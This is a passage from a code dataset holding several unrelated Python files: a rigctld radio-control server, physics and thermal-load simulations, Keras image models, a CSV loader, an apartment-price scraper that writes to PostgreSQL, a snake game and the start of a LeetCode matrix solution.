cmd in (\"1\", \"dump_caps\"):\n self.wfile.write(\"\"\"Model name: ShinySDR\n Mfg name: ShinySDR\n Rig type: Other\n Can set Frequency: Y\n Can get Frequency: Y\n Can get Mode: Y\n Can get VFO: Y\n Can set PTT: Y\n Can get PTT: Y\n Can set Level: Y\n Can get Level: Y\n \"\"\")\n rprt = 0\n elif cmd in (\"v\", \"get_vfo\"):\n self.wfile.write(\"VFOA\\n\")\n rprt = 0\n elif cmd in (\"s\", \"get_split\"):\n self.wfile.write(\"0\\nVFOA\\n\")\n rprt = 0\n elif cmd in (\"m\", \"get_mode\"):\n self.wfile.write(\"USB\\n15000\\n\")\n rprt = 0\n elif cmd in (\"f\", \"get_freq\"):\n freq = self.server.get_freq()\n logging.info(\"freq = %f\", freq)\n self.wfile.write(\"%d\\n\" % freq)\n rprt = 0\n elif cmd in (\"F\", \"set_freq\"):\n if len(args) != 1:\n rprt = -22\n else:\n freq = float(args[0])\n self.server.set_freq(freq)\n rprt = 0\n send_rprt = True\n elif cmd in (\"t\", \"get_ptt\"):\n # 0 = RX, 1 = TX\n self.wfile.write(\"%d\\n\" % self.server.get_ptt())\n rprt = 0\n elif cmd in (\"T\", \"set_ptt\"):\n if len(args) != 1:\n rprt = -22\n else:\n if int(args[0]) > 0:\n self.server.set_ptt(True)\n else:\n self.server.set_ptt(False)\n rprt = 0\n send_rprt = True\n elif cmd in (\"l\", \"get_level\"):\n if len(args) != 1:\n rprt = -22\n else:\n rprt = -1\n func = getattr(self.server, \"get_level_\"+args[0].lower())\n if func:\n fmt = \"%d\\n\"\n if RIG_LEVEL_IS_FLOAT(getattr(hamlib_constants, \"RIG_LEVEL_\"+args[0].upper(), 0)):\n fmt = \"%f\\n\"\n self.wfile.write(fmt % func())\n rprt = 0\n elif cmd in (\"L\", \"set_level\"):\n if len(args) != 2:\n rprt = -22\n else:\n rprt = -1\n func = getattr(self.server, \"set_level_\"+args[0].lower())\n if func:\n conv = int\n if RIG_LEVEL_IS_FLOAT(getattr(hamlib_constants, \"RIG_LEVEL_\"+args[0].upper(), 0)):\n conv = float\n func(conv(args[1]))\n rprt = 0\n send_rprt = True\n elif cmd == \"q\":\n return\n if rprt != 0 or send_rprt:\n self.wfile.write(\"RPRT %d\\n\" % rprt)\n\nclass RigctlServer(SocketServer.ThreadingTCPServer):\n allow_reuse_address = True\n daemon_threads = True\n\n def set_freq(self, freq):\n self.signal.set_RF_frequency.emit(freq)\n\n def get_freq(self):\n return self.tb.get_RF_frequency()\n\n def set_ptt(self, ptt):\n self.signal.set_ptt_command.emit(ptt)\n\n def get_ptt(self):\n return self.tb.get_ptt_command()\n\n def get_level_preamp(self):\n return self.tb.get_rx_gain()\n\n def set_level_preamp(self, gain):\n self.signal.set_rx_gain.emit(gain)\n\n def get_level_af(self):\n return self.tb.get_volume()\n\n def set_level_af(self, volume):\n self.signal.set_volume.emit(volume)\n\n def get_level_micgain(self):\n return self.tb.get_mic_gain() / 10\n\n def set_level_micgain(self, gain):\n self.signal.set_mic_gain.emit(gain * 10)\n\n def has_level_strength(self):\n return hasattr(self.tb, 'audio_mag_sqrd')\n\n def get_level_strength(self):\n if not self.has_level_strength():\n return 0\n # RIG_LEVEL_STRENGTH is relative to S9 or -79 dBm (S0 = -127 dBm)\n # Our noise floor is at -110 dB/Hz which shows up as -75 dB in audio_mag_sqrd.level()\n # Absent a real calibration, we'll just set -75 dBFS to S0.\n return int(10 * math.log10(self.tb.audio_mag_sqrd.level())) + 27\n \n def __init__(self, tb, signal):\n self.tb = tb\n self.signal = signal\n SocketServer.TCPServer.__init__(self, (\"localhost\", 4532), RigctlHandler)\n client_name = None\n try:\n client_name = open(\"client_name.txt\", \"r\").read().strip()\n except IOError:\n pass\n self.rci = client.Client(client_name=client_name)\n\nif __name__ == \"__main__\":\n # Create the server, binding 
to localhost on port 4532\n    server = RigctlServer(None, None)\n\n    # Activate the server; this will keep running until you\n    # interrupt the program with Ctrl-C\n    server.serve_forever()\n","sub_path":"dsheen/ssb_transceiver/rigctld.py","file_name":"rigctld.py","file_ext":"py","file_size_in_byte":9167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"604276816","text":"from datetime import datetime\nfrom joblib import Parallel, delayed\nfrom FO1Dconstants import *\nimport multiprocessing\n\nstartTimeStamp = datetime.now().strftime('%Y%m%d_%H%M%S')\n\nobject_wavelength = 900e-9\n\n\ndef create_simulated_space():\n    period = 800\n    simulated_space = np.linspace(-period, period, simulatingSpaceTotalStep)\n    return simulated_space\n\n\ndef create_object_function():\n    simulated_space = create_simulated_space()\n    # #####################Step Object#####################\n    # K = 1\n    # h = np.zeros_like(l)\n    # for counter, element in enumerate(simulated_space):\n    #     if element < 0:\n    #         h[counter] = 1\n    # h = K * h\n    # simulated_space *= 1e-9\n    # phase_shift = K * h * np.pi\n    # amp = 1\n    # #####################Step Object#####################\n\n    #####################Sin Object#####################\n    period = 800\n    kval = 30\n    K = kval * np.pi\n    h = K * np.pi * np.sin(2 * np.pi / period * simulated_space)\n    simulated_space *= 1e-9\n    phase_shift = h\n    amp = 1\n    #####################Sin Object#####################\n\n    return amp * np.exp(1j * phase_shift)\n\n\ndef main():\n    def FO1D(z, zCounter):\n        R_o = np.exp(1j * 2 * np.pi * (\n            C_3 * lamda ** 3 * (Q ** 4 - QQ ** 4) / 4 + C_5 * lamda ** 5 * (Q ** 6 - QQ ** 6) / 6 - z * lamda * (\n            Q ** 2 - QQ ** 2) / 2))\n        E_s = np.exp(-np.pi ** 2 * q_ill ** 2 * (\n            C_3 * lamda ** 3 * (Q ** 3 - QQ ** 3) + C_5 * lamda ** 5 * (Q ** 5 - QQ ** 5) - z * lamda * (\n            Q - QQ)) ** 2 / (4 * np.log(2)))\n\n        AR = np.multiply(np.multiply(np.multiply(A, R_o), E_s), E_ct)\n\n        for i in range(len(q)):\n            for j in range(i + 1, len(q)):\n                matrixI[:, zCounter] = matrixI[:, zCounter] + 2 * (\n                        AR[j][i] * np.exp(1j * 2 * np.pi * (Q[j][i] - QQ[j][i]) * simulated_space)).real\n\n        matrixI[:, zCounter] = matrixI[:, zCounter] + np.trace(AR) * np.ones_like(simulated_space)\n\n        return matrixI\n\n    simulated_space = create_simulated_space()\n    wave_obj = create_object_function()\n\n    objectFileName = \"FO1DObjectWave_\" + taskName + \"_\" + startTimeStamp + \".npy\"\n\n    F_wave_obj = np.fft.fftshift(np.fft.fft(wave_obj, simulatingSpaceTotalStep) * (1 / simulatingSpaceTotalStep))\n\n    n_max = np.floor(q_max / (1 / object_wavelength))\n    q = 1 / (simulated_space[1] - simulated_space[0]) * np.arange(0, simulatingSpaceTotalStep, 1) / (simulatingSpaceTotalStep)\n    q = q - (np.max(q) - np.min(q)) / 2\n\n    a = np.sum(np.abs(q) <= q_max)\n\n    if len(q) > a:\n        q = q[int(np.ceil(simulatingSpaceTotalStep / 2 + 1 - (a - 1) / 2)):int(np.floor(simulatingSpaceTotalStep / 2 + 1 + (a + 1) / 2))]\n        F_wave_obj = F_wave_obj[\n            int(np.ceil(simulatingSpaceTotalStep / 2 + 1 - (a - 1) / 2)):int(np.floor(simulatingSpaceTotalStep / 2 + 1 + (a + 1) / 2))]\n\n    Q, QQ = np.meshgrid(q, q)\n    F_wave_obj_q, F_wave_obj_qq = np.meshgrid(F_wave_obj, np.conj(F_wave_obj))\n\n    A = np.multiply(F_wave_obj_q, F_wave_obj_qq)\n    E_cc = (1 - 1j * np.pi * delta_fcc * lamda * (Q ** 2 - QQ ** 2) / (4 * np.log(2))) ** (-0.5)\n    E_ct = E_cc * np.exp(-np.pi ** 2 * (delta_fc * lamda * (Q ** 2 - QQ ** 2) + 1 / 2 * delta_f3c * lamda ** 3 * (\n            Q ** 4 - QQ ** 4)) ** 2 * E_cc ** 2 / (16 * np.log(2)))\n\n    matrixI = np.zeros((len(simulated_space), len(delta_z_series)), dtype=complex)\n\n    print(\"Task:\", taskName)\n    print(\"Total Task:\", len(delta_z_series))\n    print(\"Total Parallel Steps:\", np.ceil(len(delta_z_series) / (multiprocessing.cpu_count() + numberOfThreads + 1)))\n\n    with Parallel(n_jobs=numberOfThreads, verbose=50, max_nbytes=\"50M\") as parallel:\n        parallelResult = parallel(delayed(FO1D)(z, zCounter) for zCounter, z in enumerate(delta_z_series))\n\n    for mat in parallelResult:\n        matrixI += mat\n\n    matrixI = np.abs(matrixI)\n\n    resultFileName = \"FO1DResult_\" + taskName + \"_\" + startTimeStamp + \".npy\"\n\n    print(\"Saving result to:\", resultFileName)\n\n    np.save(resultFileName, matrixI)\n    print(\"Done\")\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"runFO1DSimulation.py","file_name":"runFO1DSimulation.py","file_ext":"py","file_size_in_byte":4129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"563853850","text":"# Pablo Abad 2017\n#\n# Toshl database program\n\nimport csv\nimport datetime\n\nclass CSVTransfer:\n    def __init__(self, date, effectiveDate, account, message, purpose, amount):\n        self.date = date\n        self.effectiveDate = effectiveDate\n        self.account = account\n        self.message = message\n        self.purpose = purpose\n        self.amount = amount\n\n    def __str__(self):\n        return \"(%s, %s, %s, %s, %s, %f)\" % (self.date.isoformat(), self.effectiveDate.isoformat(), self.account,\n                                             self.message, self.purpose, self.amount)\n\n    def __repr__(self):\n        return self.__str__()\n\n    @staticmethod\n    def fromFileRow(row):\n        date = datetime.datetime.strptime(row[0], \"%d.%m.%Y\").date()\n        effectiveDate = datetime.datetime.strptime(row[1], \"%d.%m.%Y\").date()\n        account = unicode(row[2], 'iso-8859-1')\n        purpose = unicode(row[3], 'iso-8859-1')\n        message = unicode(row[4], 'iso-8859-1')\n        amount = float(row[5].replace(\".\",\"\").replace(\",\",\".\"))\n        return CSVTransfer(date, effectiveDate, account, message, purpose, amount)\n\ndef loadCSVTransfersFile(filename):\n    with open(filename, 'r') as csvfile:\n        reader = csv.reader(csvfile, delimiter=';')\n        while reader.next()[0] != \"Buchung\":\n            pass\n        transfers = map(lambda row : CSVTransfer.fromFileRow(row), reader)\n        transfers.sort(key = lambda transfer: transfer.date)\n        return transfers\n","sub_path":"legacy/csvfile.py","file_name":"csvfile.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"472700818","text":"# Frozensets are immutable sets\nfs = frozenset({1, 2, 3}) # hash(fs) -272375401224217160\n\n# argument to frozenset must be any hashable iterable object\nfs = frozenset(range(4)) # frozenset({0, 1, 2, 3})\nfs = frozenset([1, 2, 3]) # frozenset({1, 2, 3})\nfs = frozenset('python') # frozenset({'h', 'n', 'o', 'p', 'y', 't'})\n\n# frozenset(([1, 2], [3, 4])) TypeError: unhashable type\n# frozenset(5) TypeError: 'int' isn't an iterable\n\n# frozensets are hashable objects.\n# we can use it as dict keys or set elements\ns = {frozenset({1, 2, 3}), frozenset('fa')} # type(s) set\n\n# frozensets only make shallow copies\nfs1 = frozenset([1, 2]) # fs1 = frozenset({1, 2})\nfs2 = fs1.copy()\t\t\t # fs2 = frozenset({1, 2})\n\n# fs1 is fs2 True, both point to the same object\n# fs1 == fs2 True, both contain the same elements; they're immutable, so it is safe.\n\n# non-mutating operations work with frozensets, such as: |, &, - and ^\ns1 = frozenset('abc')\ns2 = {1, 2}\n\n# data type will be defined by the leftmost element of the operation.\ns3 = s1 | s2 # s3 = frozenset({'b', 'c', 1, 2, 'a'})\ns4 = s2 | s1 # s4 = {'a', 1, 2, 'c', 'b'}\n\n#_____________________________________________________________________________\ndef memoizer(fn):\n\tcache = {}\n\tdef wrapper(*args, **kwargs): # with this approach, the order of kwargs does not matter\n\t\tkey = (*args, frozenset(kwargs.items())) # frozenset(args) | frozenset(kwargs.items())\n\t\t# print(cache)\n\t\t# print(key)\n\t\tif key in cache:\n\t\t\treturn cache[key]\n\t\telse:\n\t\t\tresult = fn(*args, **kwargs)\n\t\t\tcache[key] = result\n\t\t\treturn result\n\treturn wrapper\n\n@memoizer\ndef f(*, a, b):\n\treturn a + b\n\nf(a=1, b=2)\n# cache: {} kwargs.items() \n# key: (frozenset({('a', 1), ('b', 2)}),)\n\nf(a=4, b=5) # key v\n# cache: {(frozenset({('a', 1), ('b', 2)}),): 3} \n# key: (frozenset({('b', 5), ('a', 4)}),)\n\n# cache: {(frozenset({('a', 1), ('b', 2)}),): 3, (frozenset({('b', 5), ('a', 4)}),): 9}\n\n# f(a=1, b=2) or f(a=4, b=5) \n# these values are already stored in the cache; it just returns them and doesn't calculate again\n","sub_path":"python/03_hashmaps/08frozensets.py","file_name":"08frozensets.py","file_ext":"py","file_size_in_byte":2113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"353278756","text":"from __future__ import print_function\nfrom setuptools import setup\nfrom setuptools.command.test import test as TestCommand\nimport io\nimport os\nimport sys\nimport datetime\n\nimport tankerkoenig_api\n\nhere = os.path.abspath(os.path.dirname(__file__))\n__version = datetime.datetime.now().strftime(\"%Y.%m.%d.%H%M%S\")\nif \"CI_COMMIT_TAG\" in os.environ:\n    __version = os.environ[\"CI_COMMIT_TAG\"]\n\n\ndef read(*filenames, **kwargs):\n    encoding = kwargs.get('encoding', 'utf-8')\n    sep = kwargs.get('sep', '\\\\n')\n    buf = []\n    for filename in filenames:\n        with io.open(filename, encoding=encoding) as f:\n            buf.append(f.read())\n    return sep.join(buf)\n\n\nlong_description = read('README.md')\n\n\nclass Tox(TestCommand):\n    def finalize_options(self):\n        TestCommand.finalize_options(self)\n        self.test_args = []\n        self.test_suite = True\n    def run_tests(self):\n        #import here, cause outside the eggs aren't loaded\n        import tox\n        errcode = tox.cmdline(self.test_args)\n        sys.exit(errcode)\n\nsetup(\n    name='tankerkoenig_api',\n    version=__version,\n    url='https://gitlab.com/smartesthome.blog/libraries/python/tankerkoenig_api',\n    license='Apache Software License',\n    author='Iulius Gutberlet',\n    tests_require=['tox==3.3.0', 'flake8==3.5.0', 'flake8_docstrings==1.3.0'],\n    install_requires=['requests==2.19.1'],\n    cmdclass={'test': Tox},\n    author_email='iulius@sniggle.me',\n    description='tankerkoenig API',\n    long_description=long_description,\n    packages=['tankerkoenig_api'],\n    include_package_data=True,\n    platforms='any',\n    test_suite='tankerkoenig_api.test.test_tankerkoenig',\n    classifiers = [\n        'Programming Language :: Python',\n        'Development Status :: 4 - Beta',\n        'Natural Language :: English',\n        'Environment :: Web Environment',\n        'Intended Audience :: Developers',\n        'License :: OSI Approved :: Apache Software License',\n        'Operating System :: OS Independent',\n        'Topic :: Software Development :: Libraries'\n    ],\n    extras_require={\n        'testing': ['pytest'],\n        
}\n)\n","sub_path":"pypi_install_script/tankerkoenig_api-0.1.1.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"286114847","text":"'''\nWe define a simple TCL simulator here, which is similar to one-node\nmode of a water heater.\n'''\n\nimport numpy as np\nfrom .controller import thermostat_controller\n\n# we define the TCL simulator (fridge in this example)\ndef TCLsimulator(duration, # [h]\n T_0=40., # [F] initial temp\n delta_t=1./3600, # [h] time step\n C=263., # [BTU /F]\n R=.1, # [h F/BTU]\n T_amb=65., # [F]\n m_t=0, #\n P_r=2000*3.4121, # [BTU/h]\n sigma=0,\n T_s=40., # [F] set point\n deadband=2., # [F]\n enable_control=False,\n F_t=None,\n f_low=59.9,\n f_high=60.1):\n \n count = int(duration / delta_t)\n \n T_sim = np.zeros(count)\n Ms = np.zeros(count)\n P_t = np.zeros(count)\n \n T_sim[0] = T_0\n\n alpha = np.exp(-delta_t/(C*R))\n\n T_gain = R*P_r\n\n T_t = T_0\n m_t = 0\n \n for i in range(count-1):\n # the fridge has a different mechanics of ON/OFF , we need to reverse\n if enable_control and F_t is not None:\n m_t = thermostat_controller(m_t, T_t, T_s, deadband,\n enable_control,\n F_t[i],f_low,f_high,\n True)\n else:\n m_t = thermostat_controller(m_t, T_t, T_s, deadband,\n reverse_ON_OFF=True)\n # track the status change \n Ms[i] = m_t\n P_t[i] = m_t * P_r / 3.4121\n epsilon_t = sigma * np.random.randn(1)\n T_t = alpha * T_t + (1-alpha)*(T_amb - m_t * T_gain) + epsilon_t\n T_sim[i+1] = T_t\n\n return T_sim, P_t, (Ms,alpha,T_gain)\n","sub_path":"gridBallast/TCLSimulator.py","file_name":"TCLSimulator.py","file_ext":"py","file_size_in_byte":1922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"92427941","text":"import os\nimport keras\nfrom keras.datasets import cifar10\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Conv2D, Dropout, MaxPool2D, Flatten\n\nBATCHSIZE = 32\nNUMCLASSES = 10\nEPOCHS = 100\nNUM_PREDICTIONS = 20\nSAVEDIR = os.path.join(os.getcwd(), 'saved_models')\nMODELNAME = 'keras_cifar10_trained_model.h5'\n\n# Split the data between train and test set\n(trainX, trainY), (testX, testY) = cifar10.load_data()\nprint(\"trainX shape: {}\".format(trainX.shape))\nprint(\"trainY shape: {}\".format(trainY.shape))\nprint(\"testX shape: {}\".format(testX.shape))\nprint(\"testY shape: {}\".format(testY.shape))\n\n# Convert labels to one hot encode\ntrainY = keras.utils.to_categorical(trainY, NUMCLASSES)\ntestY = keras.utils.to_categorical(testY, NUMCLASSES)\n\n# Model structure\nmodel = Sequential()\n\nmodel.add(Conv2D(filters=32, kernel_size=(3, 3), input_shape=trainX.shape[1:],\n padding='same', activation='relu'))\nmodel.add(Conv2D(filters=32, kernel_size=(3, 3), activation='relu'))\nmodel.add(MaxPool2D(pool_size=(2, 2)))\nmodel.add(Dropout(0.25))\n\nmodel.add(Conv2D(filters=64, kernel_size=(3, 3), input_shape=trainX.shape[1:],\n padding='same', activation='relu'))\nmodel.add(Conv2D(filters=64, kernel_size=(3, 3), activation='relu'))\nmodel.add(MaxPool2D(pool_size=(2, 2)))\nmodel.add(Dropout(0.25))\n\nmodel.add(Flatten())\nmodel.add(Dense(units=512, activation='relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(units=NUMCLASSES, activation='softmax'))\n\n# initiate RMSpropOptimizer\noptimizer = keras.optimizers.RMSprop(learning_rate=0.0001, decay=1e-6)\n\n# Compile the model\nmodel.compile(loss='categorical_crossentropy', optimizer=optimizer, 
metrics=['accuracy'])\n\n# Normalise data\ntrainX = trainX.astype('float32')\ntestX = testX.astype('float32')\ntrainX = trainX / 255\ntestX = testX / 255\n\nmodel.fit(trainX, trainY, batch_size=BATCHSIZE, epochs=EPOCHS,\n validation_data=(testX, testY), shuffle=True)\n\n# Save model and weights\nif not os.path.isdir(SAVEDIR):\n os.makedirs(SAVEDIR)\nMODELPATH = os.path.join(SAVEDIR, MODELNAME)\nmodel.save(MODELPATH)\n\nscores = model.evaluate(testX, testY, verbose=1)\nprint('Test loss:', scores[0])\nprint('Test accuracy:', scores[1])\n\n\n\n","sub_path":"cifar10.py","file_name":"cifar10.py","file_ext":"py","file_size_in_byte":2202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"353338331","text":"from nucleus.common.extensions import db\nfrom nucleus.core.model import BaseModel\n\n\nclass Categories(BaseModel):\n __table_args__ = (db.UniqueConstraint(\"name\", \"content_type\"),)\n __filterable__ = [\"content_type\"]\n __files__ = [\"icon_id\"]\n __dictable__ = [\"id\", \"name\", \"content_type\", \"icon\"]\n __relations__ = [\"icon\"]\n\n name = db.Column(db.String, comment=\"Name\")\n content_type = db.Column(db.String, nullable=False, comment=\"Content type\")\n icon_id = db.Column(db.String, db.ForeignKey(\"files.id\"), comment=\"Icon picture\")\n\n icon = db.relationship(\"Files\", backref=\"icon_category\", uselist=False)\n","sub_path":"nucleus/models/directories.py","file_name":"directories.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"238598283","text":"import keras\r\nfrom keras.models import Sequential,Model, Input\r\nfrom keras.layers import Dense, Conv2D, MaxPool2D, Dropout, UpSampling2D, concatenate, Input\r\nfrom keras.optimizers import Adam, SGD\r\nimport tensorflow as tf\r\n\r\n\r\ndef unet(input_size, pretrained_weights=None,):\r\n\r\n input_shape = input_size\r\n inputs= Input(input_shape)\r\n conv1 = Conv2D(64, kernel_size=(7,7), activation='relu', kernel_initializer='he_normal',padding='same', data_format='channels_last',input_shape=input_shape) (inputs)\r\n pool1 =MaxPool2D(pool_size=(2,2), strides=(2,2), padding='same', data_format='channels_last')(conv1)\r\n conv2 = Conv2D(128, kernel_size=(7,7), activation='relu', padding='same', kernel_initializer='he_normal')(pool1)\r\n pool2 = MaxPool2D(pool_size=(2,2), strides=(2,2), padding='same')(conv2)\r\n conv3 = Conv2D(256, kernel_size=(7,7), activation='relu', padding='same', kernel_initializer='he_normal')(pool2)\r\n pool3 = MaxPool2D(pool_size=(2,2), strides=(2,2), padding='same' )(conv3)\r\n conv4 = Conv2D(512,kernel_size=(7,7),activation='relu', padding='same', kernel_initializer='he_normal' )(pool3)\r\n drop4 = Dropout(0.5)(conv4)\r\n up5=UpSampling2D(size=(2,2))(drop4)\r\n conv5 = Conv2D(256, kernel_size=(7,7), activation='relu', padding='same', kernel_initializer='he_normal')(up5)\r\n merge5 = concatenate([conv5, conv3], axis=-1)\r\n conv6 = Conv2D(256, kernel_size=(7,7), activation='relu', padding='same', kernel_initializer='he_normal')(merge5)\r\n up7 = UpSampling2D(size=(2,2))(conv6)\r\n conv7=Conv2D(128, kernel_size=(7,7), activation='relu',padding='same', kernel_initializer='he_normal')(up7)\r\n merge7= concatenate([conv7, conv2])\r\n conv8= Conv2D(128, kernel_size=(7,7), kernel_initializer='he_normal', padding='same', activation='relu')(merge7)\r\n up9= UpSampling2D(size=(2,2))(conv8)\r\n conv9 =Conv2D(64, kernel_size=(7,7), 
kernel_initializer='he_normal', padding='same',activation='relu')(up9)\r\n merge9 = concatenate([conv9, conv1])\r\n conv10 = Conv2D(64, kernel_size=(7,7), kernel_initializer='he_normal', padding='same',activation='relu')(merge9)\r\n conv11 = Conv2D(3, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv10)\r\n conv12 = Conv2D(1, 1, activation='sigmoid')(conv11)\r\n model = Model(inputs = inputs, outputs = conv12)\r\n if pretrained_weights is not None:\r\n model.load_weights(pretrained_weights)\r\n optimizer = SGD(lr=0.002, decay=1e-6, momentum=0.9, nesterov=True)\r\n model.compile(optimizer = optimizer, loss = 'binary_crossentropy', metrics=[tf.keras.metrics.MeanIoU(name='meanIoU',num_classes=2)], run_eagerly=False)\r\n return model\r\n\r\n","sub_path":"UNetModel.py","file_name":"UNetModel.py","file_ext":"py","file_size_in_byte":2670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"184986180","text":"import requests\nimport re\nimport psycopg2\n\n\ndef pgsql_insert(lstapart):\n conn = psycopg2.connect(dbname='test', user='postgres',\n password='110167', host='localhost')\n cursor = conn.cursor()\n cursor.execute('INSERT INTO mr_d1 ( apart, price, price_m, date, hull, floor, size, finish) VALUES (%s, %s, %s, CURRENT_DATE,%s, %s, %s, %s)',\n (lstapart[0], lstapart[1], lstapart[2], lstapart[3], lstapart[4], lstapart[5], lstapart[6],))\n conn.commit()\n cursor.close()\n conn.close()\n\n\ndef pages(site):\n r = requests.get(site)\n r_e = r.content\n r_e = bytes.decode(r_e, encoding='utf-8', errors='ignore')\n pages = re.findall(r'Pagination.*End of Pagination', r_e, flags=re.DOTALL)\n pages2 = ''.join(pages)\n pages3 = re.findall(r'data-val=\"([0-9]+)', pages2)\n pages4 = [int(item) for item in pages3]\n max1 = max(pages4)\n all_apart = max1*15\n print(all_apart)\n\n conn = psycopg2.connect(dbname='test', user='postgres',\n password='110167', host='localhost')\n cursor = conn.cursor()\n cursor.execute(\n 'INSERT INTO count_apart ( desc_apart, developer, date, all_apart) VALUES (%s, %s, CURRENT_DATE, %s )', ('d1', 'mr', all_apart,))\n conn.commit()\n cursor.close()\n conn.close()\n\n\ndef parse(site):\n r = requests.get(site)\n r_e = r.content\n r_e = bytes.decode(r_e, encoding='utf-8', errors='ignore')\n\n result = re.findall(\n r'a href=\"/catalog/apartments/dmi.*catalog-item__col _favorite-wrap', r_e, flags=re.DOTALL)\n print(type(result))\n # print(result)\n result2 = ''.join(result)\n resultsplit = re.split(r'', result2)\n\n for oneapart in resultsplit:\n apart_n = re.findall(r'alt=\"(Квартира.+)\"', oneapart)\n apart_data = re.findall(\n r'
(.+)
', oneapart)\n apart_price = re.findall(\n r'
(.+) q
', oneapart)\n apart_price_m = re.findall(\n r'
(.+) q/м²
 ', oneapart)\n        apart_price = ''.join(apart_price).replace(' ', ' ')\n        apart_price_m = ''.join(apart_price_m).replace(' ', ' ')\n        apart_n = ''.join(apart_n)\n\n        lstapart = []\n        lstapart.append(apart_n)\n        lstapart.append(apart_price)\n        lstapart.append(apart_price_m)\n        lstapart.append(''.join(apart_data[0]))\n        lstapart.append(''.join(apart_data[1]))\n        lstapart.append(''.join(apart_data[2]))\n        lstapart.append(''.join(apart_data[3]))\n        print(lstapart)\n        pgsql_insert(lstapart)\n\n\n# count how many pages there are\nall_apart = pages(\n    'https://www.mr-group.ru/catalog/apartments/?project=19&type=12&min_price=&max_price=')\n\n\n# studio apartments, Paveletskaya\nparse('https://www.mr-group.ru/catalog/apartments/?project=19&view_mode=list&scheme_building=&building=all&rooms%5B%5D=%D0%A1%D1%82%D1%83%D0%B4%D0%B8%D1%8F&min_area=&max_area=&min_price=&max_price=&floor=all&renovation=all&sort=PRICE_ASC&page=1')\n# 1-room apartments\nparse('https://www.mr-group.ru/catalog/apartments/?project=19&view_mode=list&scheme_building=&building=all&rooms%5B%5D=1&min_area=&max_area=&min_price=&max_price=&floor=all&renovation=all&sort=PRICE_ASC&page=1')\n# 2-room apartments\nparse('https://www.mr-group.ru/catalog/apartments/?project=19&view_mode=list&scheme_building=&building=all&rooms%5B%5D=2&min_area=&max_area=&min_price=&max_price=&floor=all&renovation=all&sort=PRICE_ASC&page=1')\n# 3-room apartments\nparse('https://www.mr-group.ru/catalog/apartments/?project=19&view_mode=list&scheme_building=&building=all&rooms%5B%5D=3&min_area=&max_area=&min_price=&max_price=&floor=all&renovation=all&sort=PRICE_ASC&page=1')\n","sub_path":"python/parse/mr_d1.py","file_name":"mr_d1.py","file_ext":"py","file_size_in_byte":3891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"439557773","text":"from src.window import new_window\nfrom src.color import Color\nfrom src.key import Key\nfrom src.menu import Menu, MENU\nfrom src.menu import Options\nfrom src.snake import Snake\nfrom src.game import Game\nfrom src.message import Message\n\nimport curses\n\nBLACK = curses.COLOR_BLACK\nWHITE = curses.COLOR_WHITE\nRED = curses.COLOR_RED\nYELLOW = curses.COLOR_YELLOW\nCYAN = curses.COLOR_CYAN\n\n\ndef main():\n    window = new_window()\n    menu = Menu()\n    options = Options()\n    snake = Snake()\n    game = Game()\n    message = Message()\n\n    while 'exit' != menu.selection:\n        window.resize([menu, options, game, message])\n        if 'play' == menu.selection:\n            snake.load()\n            game.window = window\n            game.snake = snake\n            game.loop()\n            message.window = window\n            message.display(menu, snake)\n            snake.reset()\n            del menu.selection\n        elif 'options' == menu.selection:\n            snake.load()\n            options.window = window\n            options.game = game\n            options.snake = snake\n            options.loop()\n            snake.save()\n            del options.selection\n            del menu.selection\n        elif 'scores' == menu.selection:\n            del menu.selection\n        elif 'help' == menu.selection:\n            message.window = window\n            message.display(menu)\n            del menu.selection\n        else:\n            menu.window = window\n            menu.game = game\n            menu.loop()\n\n    curses.endwin()\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"630491840","text":"\"\"\"\n1594. Maximum Non Negative Product in a Matrix\n\n\nYou are given a rows x cols matrix grid. \nInitially, you are located at the top-left corner (0, 0), and in each step, you can only move right or down in the matrix.\n\nAmong all possible paths starting from the top-left corner (0, 0) and ending in the bottom-right corner (rows - 1, cols - 1), find the path with the maximum non-negative product. \nThe product of a path is the product of all integers in the grid cells visited along the path.\n\nReturn the maximum non-negative product modulo 10^9 + 7. If the maximum product is negative return -1.\n\nNotice that the modulo is performed after getting the maximum product.\n\n \n\nExample 1:\n\nInput: grid = [[-1,-2,-3],\n               [-2,-3,-3],\n               [-3,-3,-2]]\nOutput: -1\nExplanation: It's not possible to get non-negative product in the path from (0, 0) to (2, 2), so return -1.\nExample 2:\n\nInput: grid = [[1,-2,1],\n               [1,-2,1],\n               [3,-4,1]]\nOutput: 8\nExplanation: Maximum non-negative product is in bold (1 * 1 * -2 * -4 * 1 = 8).\nExample 3:\n\nInput: grid = [[1, 3],\n               [0,-4]]\nOutput: 0\nExplanation: Maximum non-negative product is in bold (1 * 0 * -4 = 0).\nExample 4:\n\nInput: grid = [[ 1, 4,4,0],\n               [-2, 0,0,1],\n               [ 1,-1,1,1]]\nOutput: 2\nExplanation: Maximum non-negative product is in bold (1 * -2 * 1 * -1 * 1 * 1 = 2).\n \n\nConstraints:\n\n1 <= rows, cols <= 15\n-4 <= grid[i][j] <= 4\n\n\n\"\"\"\n\n\nclass MaximumNonNegativeProduct:\n\n    def doit_dp(self, grid: list) -> int:\n\n        m, n = len(grid), len(grid[0])\n\n        dpmax = [[float('-inf') 